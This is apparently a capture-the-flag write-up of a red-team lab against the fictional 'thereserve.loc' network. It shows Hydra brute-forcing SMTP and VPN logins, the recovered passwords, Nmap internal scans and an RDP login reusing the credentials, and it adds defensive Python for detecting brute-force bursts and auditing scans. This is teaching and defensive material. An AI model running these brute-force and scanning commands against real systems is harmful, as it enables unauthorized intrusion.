To breach the perimeter, we target the public-facing VPN server. Given its connection to the internal network, it presents a prime opportunity for initial exploitation. We first run the username and password lists against the mail server's SMTP service:
```
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]
└─$ hydra -L usernames.txt -P passwords.txt mail.thereserve.loc smtp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:10
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task
[DATA] attacking smtp://mail.thereserve.loc:25/
[STATUS] 986.00 tries/min, 986 tries in 00:01h, 9814 to do in 00:10h, 16 active
[STATUS] 1009.67 tries/min, 3029 tries in 00:03h, 7771 to do in 00:08h, 16 active
[25][smtp] host: mail.thereserve.loc login: laura.wood@corp.thereserve.loc password: Password1@
[STATUS] 1109.14 tries/min, 7764 tries in 00:07h, 3036 to do in 00:03h, 16 active
[25][smtp] host: mail.thereserve.loc login: mohammad.ahmed@corp.thereserve.loc password: Password1!
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:33
```
We can reuse the same username and password lists to perform a brute-force attack on the VPN login as well.
```
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]
└─$ hydra -L usernames.txt -P passwords.txt vpn.thereserve.loc http-get-form "/login.php:user=^USER^&password=^PASS^:Please check your username or password" -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task
[DATA] attacking http-get-form://vpn.thereserve.loc:80/login.php:user=^USER^&password=^PASS^:Please check your username or password
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[STATUS] 944.00 tries/min, 944 tries in 00:01h, 9856 to do in 00:11h, 16 active
[STATUS] 964.67 tries/min, 2894 tries in 00:03h, 7906 to do in 00:09h, 16 active
[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php
[80][http-get-form] host: vpn.thereserve.loc login: laura.wood@corp.thereserve.loc password: Password1@
[STATUS] 1058.43 tries/min, 7409 tries in 00:07h, 3391 to do in 00:04h, 16 active
[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php
[80][http-get-form] host: vpn.thereserve.loc login: mohammad.ahmed@corp.thereserve.loc password: Password1!
[STATUS] attack finished for vpn.thereserve.loc (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:52
```
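From the defender's side, both Hydra runs above are loud: sixteen parallel tasks, roughly a thousand attempts per minute from one source against one service, followed by a successful login. As an added example (not code from the original write-up), this Python sliding-window detector flags exactly that pattern in authentication logs; the log line format and the sample lines are constructed for the example and would need adapting to the real mail and VPN gateway logs.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log line format for this example; adapt the regex to the real gateway logs.
LOG_LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) svc=(?P<svc>\S+) "
                      r"user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")

def parse(line):
    m = LOG_LINE.match(line.strip())
    if m:
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        return ev

def detect_bruteforce(lines, window=timedelta(seconds=60), fail_threshold=50):
    """Sliding-window detector. Returns (src, svc, kind, detail): kind 'burst' when one
    source exceeds fail_threshold failures per window against one service, and
    'success_after_burst' when that same source then logs in (the guess landed)."""
    recent = defaultdict(deque)          # (src, svc) -> timestamps of recent failures
    bursting, alerts = set(), []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        key = (ev["src"], ev["svc"])
        q = recent[key]
        while q and ev["ts"] - q[0] > window:
            q.popleft()                  # drop failures that fell out of the window
        if ev["result"] == "FAIL":
            q.append(ev["ts"])
            if len(q) > fail_threshold and key not in bursting:
                bursting.add(key)
                alerts.append((*key, "burst", f"{len(q)} failures in {window.seconds}s"))
        elif key in bursting:
            alerts.append((*key, "success_after_burst", ev["user"]))
    return alerts

def sample_log():
    """Constructed sample: one source at roughly Hydra's rate, then a hit; one benign user."""
    t0 = datetime(2024, 11, 12, 13, 10, 10)
    users = ["laura.wood", "mohammad.ahmed", "admin"]
    lines = [f"{(t0 + timedelta(milliseconds=60 * i)).isoformat()} src=10.50.0.5 svc=smtp "
             f"user={users[i % 3]}@corp.thereserve.loc result=FAIL" for i in range(200)]
    lines.append(f"{(t0 + timedelta(seconds=13)).isoformat()} src=10.50.0.5 svc=smtp "
                 "user=laura.wood@corp.thereserve.loc result=OK")
    # A normal user mistyping once and then succeeding must not raise an alert.
    lines.append(f"{t0.isoformat()} src=10.50.0.9 svc=smtp user=bob@corp.thereserve.loc result=FAIL")
    lines.append(f"{(t0 + timedelta(seconds=5)).isoformat()} src=10.50.0.9 svc=smtp user=bob@corp.thereserve.loc result=OK")
    return sorted(lines)
```

The second alert kind is the one worth paging on: a burst alone is noise from a blocked scanner, a success after a burst means a password from the list was accepted.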
Breach
With these accounts, we can attempt to log into the webmail application, the VPN server (to obtain a VPN file assigned to the users), and, if fortunate, potentially gain Active Directory credentials. Ignoring the potential MySQL vulnerabilities for now, we focus on the webmail login.
After successfully logging into both accounts, we find that, unfortunately, nothing useful is located in the mailboxes.
Upon examining the VPN server, we successfully log in and retrieve two `.ovpn` files. The form prompts us to submit an account name. On login, it’s pre-filled with `laura.wood@corp.thereserve.loc`. Testing with my own name in the same format also works.
At the start of the challenge, during the first attempt, the routes were configured correctly, allowing us to successfully reach the internal network IPs 10.200.XXX.21 and 10.200.XXX.22, both of which are WRK machines within the internal network.
WRKX Recon (10.200.XXX.21, 10.200.XXX.22)
Scanning both hosts reveals their FQDNs, WRK_.corp.thereserve.loc, and shows that each has Remote Desktop Protocol (RDP, port 3389) open. This suggests that we may be able to log in using the users' Active Directory credentials, if those are consistent with the ones we found.
```
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV -Pn 10.200.118.21 -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 13:27 IST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.80% done
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.45% done; ETC: 13:29 (0:01:52 remaining)
Nmap scan report for 10.200.118.21
Host is up (0.36s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 21:78:e2:79:d3:93:ee:f9:aa:70:94:ec:01:b3:a5:8f (RSA)
| 256 e0:f7:b6:67:c9:93:b5:74:0f:0a:83:ff:ef:55:c8:9a (ECDSA)
|_ 256 bd:83:0c:e3:b4:4f:78:f2:e3:4a:52:03:3c:a5:ce:58 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-11-12T07:59:32+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WRK1.corp.thereserve.loc
| Not valid before: 2024-11-06T10:50:27
|_Not valid after: 2025-05-08T10:50:27
| rdp-ntlm-info:
| Target_Name: CORP
| NetBIOS_Domain_Name: CORP
| NetBIOS_Computer_Name: WRK1
| DNS_Domain_Name: corp.thereserve.loc
| DNS_Computer_Name: WRK1.corp.thereserve.loc
| DNS_Tree_Name: thereserve.loc
| Product_Version: 10.0.17763
|_ System_Time: 2024-11-12T07:58:54+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-12T07:58:56
|_ start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
```
```
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV -Pn 10.200.118.22 -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:16 IST
Nmap scan report for 10.200.118.22
Host is up (0.38s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 e6:f0:fb:5b:24:28:68:13:da:dd:c5:5f:67:4e:be:4f (RSA)
| 256 93:f5:8f:4c:31:15:fc:8e:38:03:3e:d5:b7:1c:ed:d3 (ECDSA)
|_ 256 56:3f:8a:33:a4:1f:dc:11:9a:a1:67:a6:7d:f8:76:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WRK2.corp.thereserve.loc
| Not valid before: 2024-11-06T10:50:34
|_Not valid after: 2025-05-08T10:50:34
|_ssl-date: 2024-11-12T08:48:10+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: CORP
| NetBIOS_Domain_Name: CORP
| NetBIOS_Computer_Name: WRK2
| DNS_Domain_Name: corp.thereserve.loc
| DNS_Computer_Name: WRK2.corp.thereserve.loc
| DNS_Tree_Name: thereserve.loc
| Product_Version: 10.0.17763
|_ System_Time: 2024-11-12T08:47:31+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-11-12T08:47:32
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.49 seconds
```
Internal Network Recon
Let's attempt to find other hosts with RDP enabled on the network by using Nmap with the following command:
```
nmap -p 3389 -Pn 10.200.XXX.1-254 --open
```
Replace XXX with the appropriate subnet. This command will help us identify any other machines with RDP (port 3389) open.
```
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -p 3389 -Pn 10.200.118.1-254 --open
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:22 IST
Nmap scan report for mail.thereserve.loc (10.200.118.11)
Host is up (0.27s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap scan report for 10.200.118.21
Host is up (0.27s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap scan report for 10.200.118.101
Host is up (0.27s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap done: 254 IP addresses (254 hosts up) scanned in 8.42 seconds
```
Let's attempt to find other hosts with HTTP enabled on the network by using Nmap with the following command:
```
nmap -p 80,443 -Pn 10.200.XXX.1-254 --open
```
Replace XXX with the appropriate subnet. This command will help us identify any other machines with HTTP or HTTPS (ports 80 and 443) open.
```
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -p 80,443 -Pn 10.200.118.1-254 --open
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:23 IST
Stats: 0:00:11 elapsed; 0 hosts completed (254 up), 254 undergoing Connect Scan
Connect Scan Timing: About 11.22% done; ETC: 14:24 (0:01:27 remaining)
Nmap scan report for mail.thereserve.loc (10.200.118.11)
Host is up (0.30s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for vpn.thereserve.loc (10.200.118.12)
Host is up (0.31s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for web.thereserve.loc (10.200.118.13)
Host is up (0.19s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 10.200.118.201
Host is up (0.17s latency).
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 254 IP addresses (254 hosts up) scanned in 27.00 seconds
```
After the scan, we identify a fourth machine with ports 80 and 443 exposed, serving an HTTP/HTTPS web page. When accessing the IP in the browser, the page loads with a white background, displaying no content or errors.
By checking the source code, we discover that the web page is associated with the Swift Bank web application, as indicated by the static links present in the JavaScript code.
After adding the hostname to the hosts file, we can now successfully access the Swift Bank web application.
We can also run an Nmap scan against the Swift Bank web application to identify any open ports and services that might be exposed.
```
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV swift.bank.thereserve.loc -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 15:29 IST
Nmap scan report for swift.bank.thereserve.loc (10.200.118.201)
Host is up (0.31s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 1f:42:2d:f5:4d:c6:fa:41:b1:d9:42:5b:d2:b4:bd:2e (RSA)
| 256 7f:64:d1:9d:6a:5a:a6:6f:c1:85:ff:7a:ae:d0:39:ef (ECDSA)
|_ 256 b6:e5:97:2f:47:5d:24:2c:51:84:f0:ea:69:df:58:47 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: The Reserve Online
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open ssl/https
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/stateOrProvinceName=Utah/countryName=US
| Not valid before: 2022-09-26T13:22:15
|_Not valid after: 2023-09-26T13:22:15
| tls-alpn:
| h2
|_ http/1.1
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain; charset=utf-8
| Vary: Origin
| X-Content-Type-Options: nosniff
| Date: Tue, 12 Nov 2024 09:59:40 GMT
| Content-Length: 19
| page not found
| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain; charset=utf-8
| Vary: Origin
| X-Content-Type-Options: nosniff
| Date: Tue, 12 Nov 2024 09:59:36 GMT
| Content-Length: 19
| page not found
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain; charset=utf-8
| Vary: Origin
| X-Content-Type-Options: nosniff
| Date: Tue, 12 Nov 2024 09:59:38 GMT
| Content-Length: 19
|_ page not found
|_http-cors: GET POST DELETE OPTIONS
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.31 seconds
```
It seems that, for now, we are unable to do much with the application, as only ports 22, 80, and 443 are available.
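The WRK scans and the swift.bank scan above carry three findings a defender would want pulled out automatically: RDP exposed on workstations, SMB signing enabled but not required, and a TLS certificate on the Swift Bank host that is issued for localhost and expired (valid until 2023-09-26, scanned on 2024-11-12). As an added example, not part of the original write-up, this Python audits Nmap normal output for those signals; SAMPLE is a constructed excerpt condensed from the scans above, and the scan date is passed in as an argument.

```python
import re
from datetime import datetime

# Constructed excerpt in Nmap normal-output format, condensed from the scans above.
SAMPLE = """\
Nmap scan report for 10.200.118.21
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WRK1.corp.thereserve.loc
|_Not valid after: 2025-05-08T10:50:27
| smb2-security-mode:
|_ Message signing enabled but not required
Nmap scan report for swift.bank.thereserve.loc (10.200.118.201)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0 (Ubuntu)
443/tcp open ssl/https
| ssl-cert: Subject: commonName=localhost/stateOrProvinceName=Utah/countryName=US
|_Not valid after: 2023-09-26T13:22:15
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
CN_RE = re.compile(r"commonName=([^/\s]+)")
EXPIRY_RE = re.compile(r"Not valid after: (\S+)")

def audit_nmap(text, scan_date):
    """Map each host in Nmap normal output to a list of weak-configuration
    findings. This is an added helper for the write-up, not an Nmap feature."""
    findings, host, cutoff = {}, None, datetime.fromisoformat(scan_date)
    for raw in text.splitlines():
        line = raw.strip()
        if m := HOST_RE.match(line):
            host = m.group(1)              # hostname if resolved, else the IP
            findings[host] = []
        elif host is None:
            continue
        elif m := PORT_RE.match(line):
            if m.group(1) == "3389":       # interactive logon surface for reused AD passwords
                findings[host].append("rdp-exposed")
        elif m := CN_RE.search(line):
            # Only compare the CN to a real hostname; an IP-only report cannot be matched.
            if not host[0].isdigit() and m.group(1) != host:
                findings[host].append(f"cert-cn-mismatch:{m.group(1)}")
        elif m := EXPIRY_RE.search(line):
            if datetime.fromisoformat(m.group(1)) < cutoff:
                findings[host].append(f"cert-expired:{m.group(1)}")
        elif "signing enabled but not required" in line:
            findings[host].append("smb-signing-not-required")   # NTLM relay risk
    return findings
```

Running the same audit over the full scan output above yields the same two host entries; the SMB signing finding is the one that matters most for an internal network where RDP and SMB are reachable from the VPN segment.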
By using Remmina and reusing the credentials of laura.wood, we successfully establish a connection to the WRK1 machine.
Flags 1 - 3
NOTE: We are now able to obtain the following flags by following the instructions on the e-citizen platform:
Flag 1: Breaching the Perimeter
Flag 2: Breaching Active Directory
Flag 3: Foothold on Corporate Division Tier 2 Infrastructure